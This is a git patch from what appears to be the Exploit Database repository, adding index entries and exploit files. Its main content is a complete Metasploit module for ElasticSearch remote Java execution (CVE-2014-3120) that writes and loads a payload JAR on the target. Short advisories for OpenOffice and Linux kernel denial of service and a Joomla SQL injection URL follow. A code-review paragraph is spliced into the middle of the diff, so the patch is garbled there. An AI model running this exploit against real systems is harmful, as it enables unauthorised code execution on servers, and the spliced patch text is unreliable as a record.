From a6e4c236287895740634989584f3e3052abb7061 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 1 Jun 2014 04:36:38 +0000
Subject: [PATCH] Updated 06_01_2014
---
 files.csv | 5 +
 platforms/java/remote/33588.rb | 213 +++++++++++++++++++++++++++++++
 platforms/linux/dos/33549.txt | 11 ++
 platforms/linux/dos/33585.txt | 11 ++
 platforms/php/webapps/33586.txt | 7 +
 platforms/windows/dos/33587.html | 32 +++++
 6 files changed, 279 insertions(+)
 create mode 100755 platforms/java/remote/33588.rb
 create mode 100755 platforms/linux/dos/33549.txt
 create mode 100755 platforms/linux/dos/33585.txt
 create mode 100755 platforms/php/webapps/33586.txt
 create mode 100755 platforms/windows/dos/33587.html
diff --git a/files.csv b/files.csv
index 48a672db2..b52b011bc 100755
--- a/files.csv
+++ b/files.csv
@@ -30221,6 +30221,7 @@ id,file,description,date,author,platform,type,port
 33546,platforms/php/webapps/33546.txt,"Jokes Complete Website results.php searchingred Parameter XSS",2010-01-18,indoushka,php,webapps,0
 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 'misc.php' SQL Injection Vulnerability",2010-01-18,indoushka,php,webapps,0
 33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1Multiple Cross Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0
+33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' File NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-01-19,"Hellcode Research",linux,dos,0
 33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0
 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
@@ -30254,3 +30255,7 @@ id,file,description,date,author,platform,type,port
 33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component 'catid' Parameter SQL Injection Vulnerability",2010-01-31,snakespc,php,webapps,0
 33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow Vulnerability",2009-12-31,"Francis Provencher",hardware,dos,0
 33584,platforms/multiple/dos/33584.txt,"IBM DB2 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0
+33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x 64bit Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0
+33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0
+33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel h0wl Wylecial",windows,dos,0
+33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200
diff --git a/platforms/java/remote/33588.rb b/platforms/java/remote/33588.rb
new file mode 100755
index 000000000..799fe0b8d
--- /dev/null
+++ b/platforms/java/remote/33588.rb
@@ -0,0 +1,213 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in ElasticSearch, + exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the + REST API, which requires no authentication or authorization, where the search + function allows dynamic scripts execution, and can be used for remote attackers + to execute arbitrary Java code. This module has been tested successfully on + ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. + }, + 'Author' => + [ + 'Alex Brasetvik', # Vulnerability discovery + 'Bouke van der Bijl', # Vulnerability discovery and PoC + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-3120'], + ['OSVDB', '106949'], + ['EDB', '33370'], + ['URL', 'http://bouk.co/blog/elasticsearch-rce/'], + ['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch'] + ], + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'ElasticSearch 1.1.1 / Automatic', { } ] + ], + 'DisclosureDate' => 'Dec 09 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(9200), + OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]), + OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ]) + ], self.class) + end + + def check + result = Exploit::CheckCode::Safe + + if vulnerable? 
+ result = Exploit::CheckCode::Vulnerable + end + + result + end + + def exploit + print_status("#{peer} - Trying to execute arbitrary Java..") + unless vulnerable? + fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") + end + + print_status("#{peer} - Asking remote OS...") + res = execute(java_os) + result = parse_result(res) + if result.nil? + fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...") + else + print_good("#{peer} - OS #{result} found") + end + + jar_file = "" + if result =~ /win/i + print_status("#{peer} - Asking TEMP path") + res = execute(java_tmp_dir) + result = parse_result(res) + if result.nil? + fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...") + else + print_good("#{peer} - TEMP path found on #{result}") + end + jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" + else + jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar") + end + + register_file_for_cleanup(jar_file) + execute(java_payload(jar_file)) + end + + def vulnerable? + addend_one = rand_text_numeric(rand(3) + 1).to_i + addend_two = rand_text_numeric(rand(3) + 1).to_i + sum = addend_one + addend_two + + java = java_sum([addend_one, addend_two]) + res = execute(java) + result = parse_result(res) + + if result.nil? 
+ return false + else + result.to_i == sum + end + end + + def parse_result(res) + unless res && res.code == 200 && res.body + return nil + end + + begin + json = JSON.parse(res.body.to_s) + rescue JSON::ParserError + return nil + end + + begin + result = json['hits']['hits'][0]['fields']['msf_result'][0] + rescue + return nil + end + + result + end + + def java_sum(summands) + source = <<-EOF +#{summands.join(" + ")} + EOF + + source + end + + def to_java_byte_array(str) + buff = "byte[] buf = new byte[#{str.length}];\n" + i = 0 + str.unpack('C*').each do |c| + buff << "buf[#{i}] = #{c};\n" + i = i + 1 + end + + buff + end + + def java_os + "System.getProperty(\"os.name\")" + end + + def java_tmp_dir + "System.getProperty(\"java.io.tmpdir\");" + end + + + def java_payload(file_name) + source = <<-EOF +import java.io.*; +import java.lang.*; +import java.net.*; + +#{to_java_byte_array(payload.encoded_jar.pack)} +File f = new File('#{file_name.gsub(/\\/, "/")}'); +FileOutputStream fs = new FileOutputStream(f); +bs = new BufferedOutputStream(fs); +bs.write(buf); +bs.close(); +bs = null; +URL u = f.toURI().toURL(); +URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u}); +Class c = cl.loadClass('metasploit.Payload'); +c.main(null); + EOF + + source + end + + def execute(java) + payload = { + "size" => 1, + "query" => { + "filtered" => { + "query" => { + "match_all" => {} + } + } + }, + "script_fields" => { + "msf_result" => { + "script" => java + } + } + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "_search"), + 'method' => 'POST', + 'data' => JSON.generate(payload) + }) + + return res + end + +end \ No newline at end of file diff --git a/platforms/linux/dos/33549.txt b/platforms/linux/dos/33549.txt new file mode 100755 index 000000000..0711ffe82 --- /dev/null +++ b/platforms/linux/dos/33549.txt 
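Review bot: In `execute`, the local `payload = { "size" => 1, ... }` shadows the module's `payload` method that `java_payload` relies on (`payload.encoded_jar.pack`), which is confusing in an exploit class where `payload` has a fixed meaning; renaming it, e.g. `query = { "size" => 1, ... }` with `'data' => JSON.generate(query)`, removes the ambiguity, and the trailing `return res` can go since the `send_request_cgi` result is already the last expression. `parse_result` wraps the `json['hits']['hits'][0]['fields']['msf_result'][0]` lookup in a bare `rescue`, which swallows every StandardError rather than only the shape errors the lookup can produce; `rescue NoMethodError, TypeError` names what a nil or non-Hash intermediate actually raises. `to_java_byte_array` keeps a hand-rolled counter (`i = 0` … `i = i + 1`) where `str.unpack('C*').each_with_index { |c, i| buff << "buf[#{i}] = #{c};\n" }` does the same. `java_tmp_dir` terminates its statement with `;` while `java_os` does not; the two helpers should agree. The file only requires 'msf/core', so `JSON` is presumably brought in transitively by the framework, which is worth confirming rather than assuming.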
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37857/info
+
+OpenOffice is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference.
+
+Attackers can exploit this issue by enticing an unsuspecting victim to open a specially crafted '.slk' file.
+
+Successful exploits will cause the application to crash, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+OpenOffice 3.1.0 and 3.1.1 are vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/33549.slk
\ No newline at end of file
diff --git a/platforms/linux/dos/33585.txt b/platforms/linux/dos/33585.txt
new file mode 100755
index 000000000..9b5da25e8
--- /dev/null
+++ b/platforms/linux/dos/33585.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38027/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause the affected kernel to crash, denying service to legitimate users.
+
+Versions prior to Linux kernel 2.6.33-rc6 are vulnerable.
+
+NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled.
+
+http://www.exploit-db.com/sploits/
\ No newline at end of file
diff --git a/platforms/php/webapps/33586.txt b/platforms/php/webapps/33586.txt
new file mode 100755
index 000000000..1252866b9
--- /dev/null
+++ b/platforms/php/webapps/33586.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38033/info
+
+The 'com_gambling' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid=10&gamblingEvent=[Exploit]
\ No newline at end of file
diff --git a/platforms/windows/dos/33587.html b/platforms/windows/dos/33587.html
new file mode 100755
index 000000000..0a4f34384
--- /dev/null
+++ b/platforms/windows/dos/33587.html
@@ -0,0 +1,32 @@
+
+
+
+
+
+
+
\ No newline at end of file